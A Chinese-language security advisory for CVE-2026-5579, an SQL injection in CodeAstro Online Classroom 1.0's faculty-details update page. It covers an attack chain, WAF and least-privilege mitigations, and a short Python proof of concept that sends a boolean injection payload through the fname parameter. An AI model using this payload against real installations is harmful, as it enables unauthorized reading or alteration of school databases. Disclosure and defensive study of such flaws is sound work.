CVE-2026-5579 CVSS 6.3 中危

CVE-2026-5579 CodeAstro Online Classroom SQL注入漏洞

披露日期: 2026-04-05

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-5579

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

CodeAstro Online Classroom

漏洞概述

CodeAstro Online Classroom 1.0版本被曝出存在SQL注入安全漏洞。该问题的根源在于组件参数处理器对特定文件请求的处理逻辑不当。具体而言，文件/OnlineClassroom/updatedetailsfromfaculty.php在接收参数fname时，未实施有效的安全过滤机制。这使得经过认证的低权限攻击者能够通过网络远程注入恶意SQL代码。成功利用此漏洞可能导致敏感数据泄露、数据完整性受损以及服务可用性降低，对系统安全构成中等风险。

技术细节

该漏洞存在于CodeAstro Online Classroom 1.0的参数处理组件中，具体影响文件为/OnlineClassroom/updatedetailsfromfaculty.php。开发人员在该文件处理myfid和fname参数时，直接将用户可控的输入拼接到SQL查询语句中，未使用预编译语句或进行充分的输入验证。根据CVSS向量分析，攻击复杂度低且无需用户交互。攻击者只需拥有低权限账号（PR:L），即可构造特定的SQL注入载荷发送至服务器。利用方式包括但不限于基于布尔的盲注、联合查询注入或报错注入，从而窃取数据库中的管理员凭证、用户信息等敏感数据，甚至获取服务器操作权限。

攻击链分析

STEP 1

侦察

攻击者识别目标服务器运行CodeAstro Online Classroom 1.0，并确定 vulnerable endpoint URL。

STEP 2

漏洞利用

攻击者使用低权限账户登录，并向/OnlineClassroom/updatedetailsfromfaculty.php发送包含恶意SQL语句的fname参数。

STEP 3

执行

后端数据库解析并执行注入的SQL命令，返回查询结果或执行数据库操作。

STEP 4

达成目标

攻击者成功获取数据库敏感信息（机密性），修改数据（完整性），或导致服务崩溃（可用性）。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-5579
# Target: CodeAstro Online Classroom 1.0
# Endpoint: /OnlineClassroom/updatedetailsfromfaculty.php

import requests

def check_sqli(target_ip):
    url = f"http://{target_ip}/OnlineClassroom/updatedetailsfromfaculty.php"
    # Payload attempts to cause a time-based delay or logical true condition
    payload = {
        "myfid": "108",
        "fname": "test' AND (SELECT SUBSTRING(@@version,1,1))='5'-- -"
    }
    
    try:
        response = requests.get(url, params=payload, timeout=5)
        if response.status_code == 200:
            print("[+] Request sent. Analyze response for SQL leakage.")
            print(response.text)
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    check_sqli("192.168.1.100")

影响范围

CodeAstro Online Classroom 1.0

防御指南

临时缓解措施

在官方未提供补丁前，建议在WAF（Web应用防火墙）中添加针对fname参数的SQL注入防护规则。同时，严格限制数据库账户的访问权限，确保Web应用仅使用必需的最小权限连接数据库，并定期审计数据库日志以检测异常查询。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-5579
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-5579
3 Details https://www.cvedetails.com/cve/CVE-2026-5579/
4 VulDB https://vuldb.com/cve/CVE-2026-5579
5 Link https://codeastro.com/
6 Link https://github.com/zgr0508/cve/issues/2
7 Link https://vuldb.com/submit/783752
8 Link https://vuldb.com/vuln/355349
9 Link https://vuldb.com/vuln/355349/cti

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表